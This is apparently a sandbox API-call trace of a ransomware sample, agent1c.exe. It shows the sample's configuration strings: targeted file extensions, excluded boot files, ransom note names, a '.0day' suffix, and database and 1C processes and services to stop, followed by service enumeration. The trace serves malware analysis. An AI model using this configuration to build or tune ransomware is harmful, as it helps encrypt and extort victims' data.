[0031.129] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x6439b0 [0031.129] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x6439c8 [0031.129] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x6439e0 [0031.129] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x6439f8 [0031.129] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643a10 [0031.129] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643a28 [0031.129] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643a40 [0031.130] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643a58 [0031.130] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643a70 [0031.130] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643a88 [0031.130] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643aa0 [0031.130] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643ab8 [0031.130] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643ad0 [0031.130] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643ae8 [0031.130] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643b00 [0031.130] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643b18 [0031.130] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643b30 [0031.130] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643b48 [0031.130] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x643b60 [0031.130] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x643b78 [0031.130] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x643b90 [0031.130] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x643ba8 [0031.130] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x643bc0 [0031.130] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x62a250 [0031.130] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643bd8 [0031.130] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x62a260 [0031.130] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643bf0 [0031.130] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643c08 [0031.130] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643c20 [0031.130] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x643c38 [0031.130] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x643c50 [0031.130] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643c90 [0031.130] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x643ca8 [0031.130] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643cc0 [0031.130] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643cd8 [0031.130] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x643cf0 [0031.130] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643d08 [0031.130] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x643d20 [0031.130] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x643d38 [0031.131] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643d50 [0031.131] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x62a270 [0031.131] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643d68 [0031.131] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643d80 [0031.131] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643d98 [0031.131] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643db0 [0031.131] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643dc8 [0031.131] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643de0 [0031.131] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x643070, Size=0x800) returned 0x644078 [0031.131] lstrlenW (lpString=".1cd;.3ds;.3fr;.3g2;.3gp;.7z;.accda;.accdb;.accdc;.accde;.accdt;.accdw;.adb;.adp;.ai;.ai3;.ai4;.ai5;.ai6;.ai7;.ai8;.anim;.arw;.as;.asa;.asc;.ascx;.asm;.asmx;.asp;.aspx;.asr;.asx;.avi;.avs;.backup;.bak;.bay;.bd;.bin;.bmp;.bz2;.c;.cdr;.cer;.cf;.cfc;.cfm;.cfml;.cfu;.chm;.cin;.class;.clx;.config;.cpp;.cr2;.crt;.crw;.cs;.css;.csv;.cub;.dae;.dat;.db;.dbf;.dbx;.dc3;.dcm;.dcr;.der;.dib;.dic;.dif;.divx;.djvu;.dng;.doc;.docm;.docx;.dot;.dotm;.dotx;.dpx;.dqy;.dsn;.dt;.dtd;.dwg;.dwt;.dx;.dxf;.edml;.efd;.elf;.emf;.emz;.epf;.eps;.epsf;.epsp;.erf;.exr;.f4v;.fido;.flm;.flv;.frm;.fxg;.geo;.gif;.grs;.gz;.h;.hdr;.hpp;.hta;.htc;.htm;.html;.icb;.ics;.iff;.inc;.indd;.ini;.iqy;.j2c;.j2k;.java;.jp2;.jpc;.jpe;.jpeg;.jpf;.jpg;.jpx;.js;.jsf;.json;.jsp;.kdc;.kmz;.kwm;.lasso;.lbi;.lgf;.lgp;.log;.m1v;.m4a;.m4v;.max;.md;.mda;.mdb;.mde;.mdf;.mdw;.mef;.mft;.mfw;.mht;.mhtml;.mka;.mkidx;.mkv;.mos;.mov;.mp3;.mp4;.mpeg;.mpg;.mpv;.mrw;.msg;.mxl;.myd;.myi;.nef;.nrw;.obj;.odb;.odc;.odm;.odp;.ods;.oft;.one;.onepkg;.onetoc2;.opt;.oqy;.orf;.p12;.p7b;.p7c;.pam;.pbm;.pct;.pcx;.pdd;.pdf;.pdp;.pef;.pem;.pff;.pfm;.pfx;.pgm;.php;.php3;.php4;.php5;.phtml;.pict;.pl;.pls;.pm;.png;.pnm;.pot;.potm;.potx;.ppa;.ppam;.ppm;.pps;.ppsm;.ppt;.pptm;.pptx;.prn;.ps;.psb;.psd;.pst;.ptx;.pub;.pwm;.pxr;.py;.qt;.r3d;.raf;.rar;.raw;.rdf;.rgbe;.rle;.rqy;.rss;.rtf;.rw2;.rwl;.safe;.sct;.sdpx;.shtm;.shtml;.slk;.sln;.sql;.sr2;.srf;.srw;.ssi;.st;.stm;.svg;.svgz;.swf;.tab;.tar;.tbb;.tbi;.tbk;.tdi;.tga;.thmx;.tif;.tiff;.tld;.torrent;.tpl;.txt;.u3d;.udl;.uxdc;.vb;.vbs;.vcs;.vda;.vdr;.vdw;.vdx;.vrp;.vsd;.vss;.vst;.vsw;.vsx;.vtm;.vtml;.vtx;.wb2;.wav;.wbm;.wbmp;.wim;.wmf;.wml;.wmv;.wpd;.wps;.x3f;.xl;.xla;.xlam;.xlk;.xlm;.xls;.xlsb;.xlsm;.xlsx;.xlt;.xltm;.xltx;.xlw;.xml;.xps;.xsd;.xsf;.xsl;.xslt;.xsn;.xtp;.xtp2;.xyze;.xz;.zip;") returned 1776 [0031.131] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x640068 | out: hHeap=0x5f0000) returned 1 [0031.131] lstrlenW (lpString="") returned 0 [0031.131] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x644ef8 | out: hHeap=0x5f0000) returned 1 [0031.131] lstrlenW (lpString=".0day") returned 5 [0031.131] lstrlenW (lpString=".0day") returned 5 [0031.131] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x644ef8 | out: hHeap=0x5f0000) returned 1 [0031.131] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x644f28, Size=0x20) returned 0x625988 [0031.131] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x625988, Size=0x40) returned 0x626b18 [0031.131] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x626b18, Size=0x80) returned 0x64b458 [0031.131] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x62a2e0, Size=0x8) returned 0x62a2f0 [0031.131] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x62a2f0, Size=0x10) returned 0x644f28 [0031.131] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x644f28, Size=0x20) returned 0x6259d8 [0031.131] lstrlenW (lpString="boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys;") returned 48 [0031.132] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x64b458 | out: hHeap=0x5f0000) returned 1 [0031.132] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x644f58, Size=0x20) returned 0x625a00 [0031.132] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x625a00, Size=0x40) returned 0x626b18 [0031.132] lstrlenW (lpString="RETURN FILES.txt") returned 16 [0031.132] lstrlenW (lpString="RETURN FILES.txt") returned 16 [0031.132] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x626b18 | out: hHeap=0x5f0000) returned 1 [0031.132] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x644f58, Size=0x20) returned 0x625a00 [0031.132] lstrlenW (lpString="Info.hta") returned 8 [0031.132] lstrlenW (lpString="Info.hta") returned 8 [0031.132] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625a00 | out: hHeap=0x5f0000) returned 1 [0031.132] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x66d468, nSize=0x7fff | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\agent1c.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\agent1c.exe")) returned 0x31 [0031.132] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x66d468 | out: hHeap=0x5f0000) returned 1 [0031.132] lstrlenW (lpString="agent1c.exe") returned 11 [0031.132] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6259d8, Size=0x40) returned 0x626b18 [0031.132] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x644f58, Size=0x20) returned 0x6259d8 [0031.132] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x644f58, Size=0x20) returned 0x625a00 [0031.132] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x625a00, Size=0x40) returned 0x626b60 [0031.133] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x626b60, Size=0x80) returned 0x64b458 [0031.133] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x64b458, Size=0x100) returned 0x641088 [0031.133] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0031.133] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x641088 | out: hHeap=0x5f0000) returned 1 [0031.133] ExpandEnvironmentStringsW (in: lpSrc="%windir%;", lpDst=0x66d468, nSize=0x8000 | out: lpDst="C:\\Windows;") returned 0xc [0031.133] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x67d470 | out: hHeap=0x5f0000) returned 1 [0031.133] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x66d468 | out: hHeap=0x5f0000) returned 1 [0031.133] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x62a2f0, Size=0x8) returned 0x62a2e0 [0031.133] lstrlenW (lpString="%windir%;") returned 9 [0031.133] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6259d8 | out: hHeap=0x5f0000) returned 1 [0031.133] lstrlenW (lpString="C:\\Windows;") returned 11 [0031.133] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x65d460 | out: hHeap=0x5f0000) returned 1 [0031.133] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x644f70, Size=0x20) returned 0x6259d8 [0031.133] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6259d8, Size=0x40) returned 0x626b60 [0031.133] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x626b60, Size=0x80) returned 0x64b458 [0031.133] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x64b458, Size=0x100) returned 0x641088 [0031.133] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x62a320, Size=0x8) returned 0x62a330 [0031.133] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x62a330, Size=0x10) returned 0x644fb8 [0031.133] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x644fb8, Size=0x20) returned 0x6259d8 [0031.133] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x62a2f0, Size=0x8) returned 0x62a330 [0031.133] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x62a300, Size=0x8) returned 0x62a2f0 [0031.133] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x62a320, Size=0x8) returned 0x62a340 [0031.133] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x62a340, Size=0x10) returned 0x645060 [0031.133] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x645060, Size=0x20) returned 0x625a00 [0031.133] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x62a330, Size=0x10) returned 0x645060 [0031.133] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x62a2f0, Size=0x10) returned 0x640098 [0031.133] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x62a330, Size=0x8) returned 0x62a320 [0031.133] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x62a350, Size=0x8) returned 0x62a360 [0031.133] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x645060, Size=0x20) returned 0x625a28 [0031.133] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x640098, Size=0x20) returned 0x625a50 [0031.133] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x62a370, Size=0x8) returned 0x62a380 [0031.134] lstrlenW (lpString="doc(.doc;.docx;.pdf;.xls;.xlsx;.ppt;)arc(.zip;.rar;.bz2;.7z;)dbf(.dbf;)1c8(.1cd;)jpg(.jpg;)") returned 91 [0031.134] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x641088 | out: hHeap=0x5f0000) returned 1 [0031.134] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x640128, Size=0x20) returned 0x625aa0 [0031.134] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%", lpDst=0x65d460, nSize=0x7fff | out: lpDst="C:") returned 0x3 [0031.134] lstrlenW (lpString="C:\\") returned 3 [0031.134] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x18fcac, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18fcac*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0031.134] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x65d460 | out: hHeap=0x5f0000) returned 1 [0031.134] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x643088, Size=0x82) returned 0x63be90 [0031.134] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6430a8, Size=0x100) returned 0x641088 [0031.134] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x63be90, Size=0x104) returned 0x6408f8 [0031.134] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x641088, Size=0x200) returned 0x645098 [0031.135] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x643098 | out: hHeap=0x5f0000) returned 1 [0031.135] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x645098 | out: hHeap=0x5f0000) returned 1 [0031.135] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6401d0 | out: hHeap=0x5f0000) returned 1 [0031.135] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x64b678 | out: hHeap=0x5f0000) returned 1 [0031.135] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x640188 | out: hHeap=0x5f0000) returned 1 [0031.135] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x64b5f0 | out: hHeap=0x5f0000) returned 1 [0031.135] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6401b8 | out: hHeap=0x5f0000) returned 1 [0031.135] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6408f8 | out: hHeap=0x5f0000) returned 1 [0031.135] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6401a0 | out: hHeap=0x5f0000) returned 1 [0031.135] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x63bf20 | out: hHeap=0x5f0000) returned 1 [0031.136] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6401e8 | out: hHeap=0x5f0000) returned 1 [0031.136] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x640868 | out: hHeap=0x5f0000) returned 1 [0031.136] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x640200 | out: hHeap=0x5f0000) returned 1 [0031.136] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x640200, Size=0x20) returned 0x625ac8 [0031.136] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x625ac8, Size=0x40) returned 0x626b60 [0031.136] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x62a390 | out: hHeap=0x5f0000) returned 1 [0031.136] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x640128 | out: hHeap=0x5f0000) returned 1 [0031.136] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x63c3c0 | out: hHeap=0x5f0000) returned 1 [0031.136] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x640158 | out: hHeap=0x5f0000) returned 1 [0031.136] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x64b568 | out: hHeap=0x5f0000) returned 1 [0031.136] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x640140 | out: hHeap=0x5f0000) returned 1 [0031.136] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x62a3a0 | out: hHeap=0x5f0000) returned 1 [0031.136] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x640170 | out: hHeap=0x5f0000) returned 1 [0031.136] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x63b568 | out: hHeap=0x5f0000) returned 1 [0031.136] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x626128 | out: hHeap=0x5f0000) returned 1 [0031.136] lstrlenW (lpString="%systemdrive%") returned 13 [0031.136] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625aa0 | out: hHeap=0x5f0000) returned 1 [0031.136] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x64b458 | out: hHeap=0x5f0000) returned 1 [0031.136] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x62a370 | out: hHeap=0x5f0000) returned 1 [0031.136] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091f0, lpParameter=0x64d440, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x10c [0031.778] WaitForMultipleObjects (nCount=0x2, lpHandles=0x627c30*=0x100, bWaitAll=1, dwMilliseconds=0xffffffff) Thread: id = 2 os_tid = 0xa80 Thread: id = 4 os_tid = 0xa8c [0031.737] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x640170 [0031.737] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x640170, Size=0x20) returned 0x625ac8 [0031.737] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x625ac8, Size=0x40) returned 0x626ba8 [0031.737] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x626ba8, Size=0x80) returned 0x64b458 [0031.737] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x64b458, Size=0x100) returned 0x641088 [0031.737] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x640170 [0031.737] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x640170, Size=0x20) returned 0x625ac8 [0031.737] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x625ac8, Size=0x40) returned 0x626ba8 [0031.737] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x626ba8, Size=0x80) returned 0x64b458 [0031.737] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x64b458, Size=0x100) returned 0x641190 [0031.737] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x640170 [0031.737] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4) returned 0x62a370 [0031.737] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x640140 [0031.737] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x62a370, Size=0x8) returned 0x62a3a0 [0031.737] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x14) returned 0x626148 [0031.737] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x62a3a0, Size=0x10) returned 0x640158 [0031.737] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x626168 [0031.737] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1a) returned 0x625ac8 [0031.737] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x640158, Size=0x20) returned 0x625af0 [0031.737] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1c) returned 0x625b18 [0031.737] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x16) returned 0x626188 [0031.737] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1a) returned 0x625b40 [0031.737] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x640158 [0031.737] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4) returned 0x62a3a0 [0031.737] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40) returned 0x626ba8 [0031.737] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x62a3a0, Size=0x8) returned 0x62a370 [0031.737] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3c) returned 0x626bf0 [0031.737] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x62a370, Size=0x10) returned 0x640128 [0031.737] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x14) returned 0x6261a8 [0031.737] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x6261c8 [0031.738] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x640128, Size=0x20) returned 0x625b68 [0031.738] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x63c3c0 [0031.738] lstrlenW (lpString="1c8.exe;1cv77.exe;outlook.exe;postgres.exe;mysqld-nt.exe;mysqld.exe;sqlservr.exe;") returned 81 [0031.738] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x641088 | out: hHeap=0x5f0000) returned 1 [0031.738] lstrlenW (lpString="FirebirdGuardianDefaultInstance;FirebirdServerDefaultInstance;sqlwriter;mssqlserver;sqlserveradhelper;") returned 102 [0031.738] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x641190 | out: hHeap=0x5f0000) returned 1 [0031.738] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x625c08 [0031.739] EnumServicesStatusExW (in: hSCManager=0x625c08, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 0 [0031.740] GetLastError () returned 0xea [0031.740] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x11e4) returned 0x65e4a0 [0031.740] EnumServicesStatusExW (in: hSCManager=0x625c08, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x65e4a0, cbBufSize=0x11e4, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x65e4a0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 1 [0031.741] CloseServiceHandle (hSCObject=0x625c08) returned 1 [0031.741] lstrlenW (lpString="Appinfo") returned 7 [0031.741] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0031.741] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0031.741] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0031.741] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0031.741] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0031.741] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0031.741] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0031.741] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0031.742] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0031.742] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0031.742] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0031.742] lstrlenW (lpString="AudioSrv") returned 8 [0031.742] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0031.742] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0031.742] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0031.742] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0031.742] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0031.742] lstrlenW (lpString="BFE") returned 3 [0031.742] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0031.742] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0031.742] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0031.742] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0031.742] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0031.742] lstrlenW (lpString="CryptSvc") returned 8 [0031.742] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0031.742] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0031.742] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 